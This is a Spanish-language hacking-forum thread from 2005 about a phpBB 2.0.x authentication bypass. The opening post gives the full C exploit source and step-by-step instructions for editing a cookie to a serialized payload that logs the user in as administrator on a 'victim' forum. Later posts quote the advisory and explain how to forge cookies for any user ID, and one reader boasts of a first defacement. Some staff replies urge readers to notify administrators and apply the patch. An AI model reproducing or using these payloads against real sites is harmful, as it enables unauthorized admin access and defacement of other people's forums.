elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 11:50  


Tema destacado: Últimos eventos sobre seguridad/inseguridad

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Exploit phpbb 2.0.XXX y como utilizarlo		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 Ir Abajo Respuesta Imprimir
Autor Tema: Exploit phpbb 2.0.XXX y como utilizarlo  (Leído 59,633 veces)
+ enrique ZP


Desconectado Desconectado

Mensajes: 2.937


X-Aqui


Ver Perfil WWW
Exploit phpbb 2.0.XXX y como utilizarlo
« en: 1 Marzo 2005, 17:06 »
   

     Hoy por la noche encontre este exploit en la web de http://www.k-otik.com esta muy facil de usar fuen enviado por  un tal Paisterist.

phpBB Session Handling Administrator Authentication Bypass Exploit
http://www.k-otik.com/exploits/20050228.phpbbsession.c.php

Citar
phpBB 2.0.x Session Handling Administrator Authentication Bypass Exploit
Date : 28/02/2005
 Related Advisories : KOTIK/ADV-2005-0212
Rated as : High
/*
Author: Paisterist
Date: 28-02-05
[N]eo ecurity [T]eam ©
Description: this exploit modify the user id that is in your
cookies.txt (Firefox and Mozilla) file.
You have to log in the forum, with the autologin option unchecked,
then you close the navigator and
execute the exploit.
If you have any problem with the exploit, remove all cookies and do all
again.
Note: you have to put the exploit in the same directory of cookies.txt.
This exploit overwrite all phpbb cookies that have the user id
specified.
I HAVE NOT DISCOVERED THIS VULNERABILITY, I DON'T KNOW WHO HAS
DISCOVERED IT.
By Paisterist
http://neosecurityteam.net
http://neosecurityteam.tk
Greetz: Hackzatan, Crashcool, Towner, Daemon21, Wokkko, Maxx,
Arcanhell, Alluz.

El codigo de dicho exploit es el siguiente:

Código:
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char** argv[]) {
FILE *pointer;
char contenido[10000],

cookie[91]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0
%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22",
cookief[9]="%22%3B%7D", cookiec[106],

cookie_false[92]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb
%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D",
*pos;
int p=0, i=0;

if (argc!=2) {
printf("Usage: phpbb_exploit.exe user_id\n\n");
exit(0);
}
pointer=fopen("cookies.txt", "r");

if (pointer) {
fread(contenido, 300, 10, pointer);
fclose(pointer);
} else {
printf("The file can't be open\n");
exit(0);
}

strcpy(cookiec, cookie);
strncat(cookiec, argv[1], 6);
strcat(cookiec, cookief);

if (pos=strstr(contenido, cookiec)) {
p=pos - contenido;
while (i<92) {
if (cookie_false[i]!=NULL)
contenido[p]=cookie_false[i];
p++;
i++;
}
}
else {
printf("The file cookies.txt isn't valid for execute the
exploit or the user id is incorrect\n");
exit(0);
}

if (pointer=fopen("cookies.txt", "w")) {
fputs(contenido, pointer);
printf("Cookie modified: \n\n%s\n\n", contenido);
printf("The cookies file has overwriten... looks like the exploit has worked");
} else printf("\n\nThe file cookies.txt has not write permissions.");
return 0;
}

Bueno ahora para utilizarlo de una manera rapida y sencilla vamos a descargarnos el IE Cookie Viewer. de donde me lo descargo??? pues de esta web  http://www.nirsoft.net/utils/iecv.zip
e el karen cookie viewer que ni anda nada mal http://www.karenware.com/progs/ptcookie-setup.exe

Una vez te lo hayas descargado lo descomprimer y lo ejecutas.

Ahora abre el IE explorer y pon la url de tu victima claro siendo un foro phpBB2.0.X

Ahora f5 en el programa y ahi busca la url o galleta de la web a atakar, tocala y en la parte de abajo veras que te aparece algo de base de datos msql.

Has click derecho en el y ponle modificar cookie

En la parte de abajo te apareceran los checks con todas las cookies de esa web, has click derecho en la de el foro y pon modificar cookie  :)

Donde dice
Código:
a:0:{}
borralo y envez de eso pon
Código:
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}

Una vez que lo hayas cambiado ponle modificar cookie y luego ponle que si

Despues dale a la url o la cookie y ponle abrir website.

Se te abrira una ventana en el explorador IE de el foro phpBB y te habras logeado como admin. ;)

Bueno eso es todo, ahora si lo van a probar no anden de estupidos lammers jodiendo webs, pruebenlo solo haciendo llamados es decir solo pongan por ejemplo, DEFACED BY TU NOMBRE!, eso es todo no hay nesecidad de borrar nada.


Hasta la Proxima ;) ;)
« Última modificación: 2 Marzo 2005, 18:02 por NoBaLoGiC » En línea
DisaDapter

Desconectado Desconectado

Mensajes: 139

If you want to live come with me


Ver Perfil
Re: Exploit para foros phpbb 2.0.XXX
« Respuesta #1 en: 1 Marzo 2005, 17:24 »
Esta bien lo e probado y me a funcionado a la perfeccion

e¿hice mir primer deface :D

Chua
« Última modificación: 3 Marzo 2005, 15:14 por DisaDapter » En línea
Conemrad

Desconectado Desconectado

Mensajes: 74


Ver Perfil
Re: Exploit phpbb 2.0.XXX y como utilizarlo
« Respuesta #2 en: 1 Marzo 2005, 22:10 »
lo he probado con un foro version phpBB 2.0.7 y no me ha funcionado.

El codigo habeis conseguido compilarlo?
En línea
+ enrique ZP


Desconectado Desconectado

Mensajes: 2.937


X-Aqui


Ver Perfil WWW
Re: Exploit phpbb 2.0.XXX y como utilizarlo
« Respuesta #3 en: 1 Marzo 2005, 22:15 »
MIra yo para utilizarlo no e compilado nada y a mi me a funcionado muy bien,


Citar
Bueno ahora para utilizarlo de una manera rapida y sencilla vamos a descargarnos el IE Cookie Viewer. de donde me lo descargo??? pues de esta web  http://www.nirsoft.net/utils/iecv.zip

Una vez te lo hayas descargado lo descomprimer y lo ejecutas.

Ahora abre el IE explorer y pon la url de tu victima claro siendo un foro phpBB2.0.X

Ahora f5 en el programa y ahi busca la url o galleta de la web a atakar, tocala y en la parte de abajo veras que te aparece algo de base de datos msql.

Has click derecho en el y ponle modificar cookie

En la parte de abajo te apareceran los checks con todas las cookies de esa web, has click derecho en la de el foro y pon modificar cookie  Smiley

Donde dice
Código:
a:0:{}
borralo y envez de eso pon
Código:
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}

Una vez que lo hayas cambiado ponle modificar cookie y luego ponle que si

Despues dale a la url o la cookie y ponle abrir website.

Se te abrira una ventana en el explorador IE de el foro phpBB y te habras logeado como admin. Wink

Bueno eso es todo, ahora si lo van a probar no anden de estupidos lammers jodiendo webs, pruebenlo solo haciendo llamados es decir solo pongan por ejemplo, DEFACED BY TU NOMBRE!, eso es todo no hay nesecidad de borrar nada.


Hasta la Proxima

prueba esta manera
En línea
Conemrad

Desconectado Desconectado

Mensajes: 74


Ver Perfil
Re: Exploit phpbb 2.0.XXX y como utilizarlo
« Respuesta #4 en: 1 Marzo 2005, 22:26 »
si lo he probado asi, pero no me ha funcionado. kizas sea ese foro, no lo se.
En línea
Conemrad

Desconectado Desconectado

Mensajes: 74


Ver Perfil
Re: Exploit phpbb 2.0.XXX y como utilizarlo
« Respuesta #5 en: 1 Marzo 2005, 23:02 »
lo he vuelto a probar con unos cuantos de foros y sigue sin funcionarme

Que hago mal? xDDDD
En línea
+ enrique ZP


Desconectado Desconectado

Mensajes: 2.937


X-Aqui


Ver Perfil WWW
Re: Exploit phpbb 2.0.XXX y como utilizarlo
« Respuesta #6 en: 2 Marzo 2005, 01:07 »
Bueno miremos...

Bajate el IE COOKIE VIEWER

luego le das modificar a la cookie de el foro a hackear

y Donde dice
a:0:{}
borralo y envez de eso pon
Código:
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}

luego dale acceptar y eso es todo, ya tenes la cookie modificada y ya eres administrador. solo te digo que e probado con webs afiliadas al elhacker.net y sus foros son muy vulnerables. Ya les e enviado un correo a los administradores invitandolos a parchear este bug ;)

bueno ahora solo seleccionas la cookie y le pones openwebsite

eso te deberia de logear como administrador de la web, e intentado con varios ya y pues si me deja....

acuerdate que este exploit es solo para las versiones phpBB2.0.xxx
donde x puede ser 1 2 3 etc,, osea cualquier version.

prueba no tienes que compilar nada ni nada ;)
En línea
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 17.227


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: Exploit phpbb 2.0.XXX y como utilizarlo
« Respuesta #7 en: 2 Marzo 2005, 01:26 »
Citar
Hoy por la noche encontre este exploit en la web de http://www.k-otik.com esta muy facil de usar fuen enviado por  un tal Paisterist.

El exploit fue publicado originalmente el sábado día 26 de Febrero en waraxe.us por Heintz

Zaerik, Nerviozzo y Unravel confirmaron el domingo 27 la existencia del grave agujero de seguridad en los foros phpbb 2.0.12 y anteriores.

El staff de elhacker.net decidió no hacerlo público con el fin de evitar males mayores.

El advisory y exploit original por  Heintz  fue este:

Citar
vulnearable code @ /includes/sessions.php

$sessiondata = isset($HTTP_COOKIE_VARS[$cookiename . '_data']) ? unserialize(stripslashes($HTTP_COOKIE_VARS[$cookiename . '_data'])) : array();

here we see a array unserialized from cookie.
after a while we get to part where array data is compared:


if( $sessiondata['autologinid'] == $auto_login_key )
{
// autologinid matches password
$login = 1;
$enable_autologin = 1;
}

the if() statement compares unserialized array data with string and evaluates to false if they don't match.
However when unserialize array contains a boolean(true) value then the == operator evaluetes
statement always as true, thus bypassing authendication completly.
A quick fix for programmers would be to use === instead of == operator.

example exploit:

cookie contains this data on normal admin session.

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
(which is urldecoded a serialized array string a:2:{s:11:"autologinid";s:0:"";s:6:"userid";s:1:"2";})

now if we are to attack a user whos numerical id is 2
- which is in many cases admin.

then we change cookie data to:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

( urldecoded array: a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";} )
and we are logged as user with id 2.

Zaeirk explico un métodos super-sencillo de explotarlo:
Citar
Vemos que en el texto en ingles aparece esto:

Código:
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}

Veis el "2" que pone al final del codigo?, pues lo cambiais por la ID del usuario con el que os querais logear, por ejemplo si quereis logearos con el usuario con ID 24, pues tendriais que:

- Cambiar el "2" por un "24".

- Cambiar el "1" que va antes del 24 por un "2", esto es por que la ID tiene 2 caracteres y por medio de ese numero que va antes del 24 se le indica al foro cuantos caracteres tiene la ID (gracias Crack_X: http://foro.elhacker.net/index.php/topic,59632.msg274485.html#msg274485), quedaria asi:

Código:
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:2:"24";}

Una vez que tengais esto os venis aqui:

http://www.elhacker.net/sneak.php

Introducis este texto:

Código:
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:2:"24";}

Abajo donde pone Ascii to Binary elegis "Url Encode" y le dais a "codificar" y os aparecera esto:

Citar
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:2:"24";} converts to:

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A2%3A%2224%22%3B%7D

Ya esta todo listo, ahora tendriais que sustituir el valor de la cookie por este (que es el que habeis generado para logearos con el usuario con ID 24):

Código:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A2%3A%2224%22%3B%7D
En línea
"elhacker.net es único, por eso no fabrica para otras marcas"  - Prohibido prohibir
jvchino
Solo soy un
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.993


La felicidad no es una meta, es un camino.


Ver Perfil
Re: Exploit phpbb 2.0.XXX y como utilizarlo
« Respuesta #8 en: 2 Marzo 2005, 02:12 »
Ok jóvenes, demuestren su madurez y responsabilidad.
Si ya demostraron que pueden entrar a un foro, no jod** nada, y hagan lo que muchos miembros del staff han hecho, sólo comuníquenle al administrador del fallo y que lo corrija con este parche:

http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=267563

Uno muestra de lo que hace elhacker.net
http://www.hackxcrack.com/phpBB2/viewtopic.php?t=22483

Saludos.
« Última modificación: 2 Marzo 2005, 02:14 por jvchino » En línea
Si ayudo a una sola persona a tener esperanza, no habré vivido en vano.

No, nada llega tarde, porque todas las cosas
tienen su tiempo justo, como el trigo y las rosas
+ enrique ZP


Desconectado Desconectado

Mensajes: 2.937


X-Aqui


Ver Perfil WWW
Re: Exploit phpbb 2.0.XXX y como utilizarlo
« Respuesta #9 en: 2 Marzo 2005, 02:17 »
Cita de: jvchino en  2 Marzo 2005, 02:12
Ok jóvenes, demuestren su madurez y responsabilidad.
Si ya demostraron que pueden entrar a un foro, no jod** nada, y hagan lo que muchos miembros del staff han hecho, sólo comuníquenle al administrador del fallo y que lo corrija con este parche:

http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=267563

Uno muestra de lo que hace elhacker.net
http://www.hackxcrack.com/phpBB2/viewtopic.php?t=22483

Saludos.

Yo hago el mismo llamado le e mandado un privado al admin de este foro para que le avise a las webs afiliadas  ;)

Vamos chicos sean maduros miren pero no toquen ;)
En línea
Ertai
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.026


Ralph Wiggum


Ver Perfil
Re: Exploit phpbb 2.0.XXX y como utilizarlo
« Respuesta #10 en: 2 Marzo 2005, 05:05 »
Yo ya he avisado a un admin...
Ya os vale a todos, postear esto justo cuando mañana tengo examen de historia  :'( :'(  ;)
Saludos,
Ertai
En línea
Si la felicidad se comprara, entonces el dinero sería noble.

Código:
void rotar_by_ref(int& a, int& b) {
   /* Quien dijo que no se podia sin una variable temporal? */
   *a = *a ^ *b;
   *b = *a ^ *b;
   *a = *a ^ *b;
}
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 17.227


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: Exploit phpbb 2.0.XXX y como utilizarlo
« Respuesta #11 en: 2 Marzo 2005, 05:13 »
http://www.elhacker.net/noticias/

Citar
Bug en foros PhPbb 2.0.12 para logearse como cualquier usuario (admin incluso)

Citar
Noticia publicada el 28 Feb 2005 por el-brujo

Hay que estar al día y visitar más la web ¿eh? xD
En línea
"elhacker.net es único, por eso no fabrica para otras marcas"  - Prohibido prohibir
rockero

Desconectado Desconectado

Mensajes: 98



Ver Perfil
Re: Exploit phpbb 2.0.XXX y como utilizarlo
« Respuesta #12 en: 2 Marzo 2005, 07:22 »
yo se que esta pregunta serulta estúpida pero de todos modos la tengo  que hacer   una ves te hayas autologiado que mas sigue ??? ???
 le avisaré al administrador ??? bueno uds diganme que  se hace
En línea
Crack_X
Anti-War
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.320


Peace & Love


Ver Perfil WWW
Re: Exploit phpbb 2.0.XXX y como utilizarlo
« Respuesta #13 en: 2 Marzo 2005, 07:25 »
Despues que estes logueado pues sabes que es vulnerable y le avisas al administrador lo mas pronto posible.
En línea
Shit loads of money spend to show us wrong from right. Say no to war


Yasser Has Things To Say
WarZone
rockero

Desconectado Desconectado

Mensajes: 98



Ver Perfil
Re: Exploit phpbb 2.0.XXX y como utilizarlo
« Respuesta #14 en: 2 Marzo 2005, 07:28 »
orale man buena onda voy a tomar tu consejo
En línea
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Troyano Bck / Crazzynet (como utilizarlo ?)
Hacking Básico 		zxero 3 1,784 Último mensaje 16 Enero 2011, 21:21
por [L]ord [R]NA
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines